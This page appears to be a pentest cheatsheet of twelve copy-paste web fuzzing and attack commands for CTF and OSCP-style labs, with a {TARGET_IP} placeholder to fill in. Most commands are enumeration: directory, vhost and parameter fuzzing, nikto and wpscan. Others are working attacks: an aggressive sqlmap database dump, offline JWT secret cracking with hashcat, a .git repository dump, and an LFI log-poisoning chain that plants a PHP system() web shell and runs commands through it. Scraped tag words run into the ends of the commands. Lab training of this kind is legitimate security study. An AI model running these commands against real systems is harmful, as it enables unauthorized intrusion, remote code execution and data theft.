Web & Directory Fuzzing cheatsheet
12 copy-paste commands for web & directory fuzzing in CTFs and OSCP-style labs. Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.
ffuf Directory & Endpoint Fuzzing
High-speed directory enumeration with auto-calibrated filtering and extension recursion.
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://{TARGET_IP}/FUZZ -e .php,.html,.txt,.bak,.js -ac -mc 200,301,302,403ffufwebfuzzdir
ffuf VHost / Virtual Subdomain Fuzzing
Fuzz HTTP Host header for virtual hosts; use -fs to filter default baseline size.
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://{TARGET_IP} -H "Host: FUZZ.target.htb" -mc 200,301,302 -fs 1234ffufvhostsubdomaindns
ffuf Parameter Discovery (GET/POST)
Fuzz hidden query parameters on target page.
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u "http://{TARGET_IP}/index.php?FUZZ=test" -acffufparamsquery
Gobuster Fast Directory Busting
Standard Go-based multithreaded directory search.
gobuster dir -u http://{TARGET_IP}/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,sh,json -t 40 -b 404gobusterwebdir
Feroxbuster Recursive Crawl & Fuzz
Deep Rust recursive crawler with smart 404 detection and auto-extract.
feroxbuster -u http://{TARGET_IP}/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,asp,aspx,jsp -d 2feroxbusterrecursivecrawler
Nikto Web Server Misconfiguration Audit
Exhaustive web server check for outdated components, index files, and CGI leaks.
nikto -h http://{TARGET_IP} -Tuning 123bde -o nikto_{TARGET_IP}.html -Format htmniktowebmisconfig
WPScan WordPress Enumeration & Attack
Enumerate vulnerable plugins, themes, and usernames on WordPress sites.
wpscan --url http://{TARGET_IP}/ --enumerate ap,at,u,cb --plugins-detection aggressivewpscanwordpresscms
SQLmap Heavy Injection Probe (Risk 3 / Level 5)
High-potency SQL injection test checking all HTTP headers, cookies, and injection boundaries.
sqlmap -u "http://{TARGET_IP}/page?id=1" --batch --risk=3 --level=5 --threads=4 --dbssqlmapsqliwebadvanced
JWT Secret Key HMAC-SHA256 Cracking
Crack HS256 signed JSON Web Token secrets offline using rockyou wordlist.
hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txtjwthashcatcryptoweb
GraphQL Schema Introspection Query
Query GraphQL endpoint for full type schema, queries, mutations, and hidden fields.
curl -s -X POST -H "Content-Type: application/json" -d '{"query":"{__schema{types{name,fields{name}}}}"}' http://{TARGET_IP}/graphql | jq .graphqlapiintrospectionweb
Exposed .git Source Code Extraction
Dump full repository commits and source code from misconfigured public /.git/ directory.
git-dumper http://{TARGET_IP}/.git/ ./git-dumpgitsource-leakgit-dumperweb
LFI Log Poisoning via User-Agent
Inject PHP execution payload into web server access log, then include via LFI.
curl -s -A "<?php system(\$_GET['cmd']); ?>" http://{TARGET_IP}/ && curl "http://{TARGET_IP}/index.php?page=/var/log/apache2/access.log&cmd=id"lfircelog-poisoningapache
Use these commands with your values filled in. ZeroBox interpolates target IP, domain and credentials into every command. Open the cheatsheet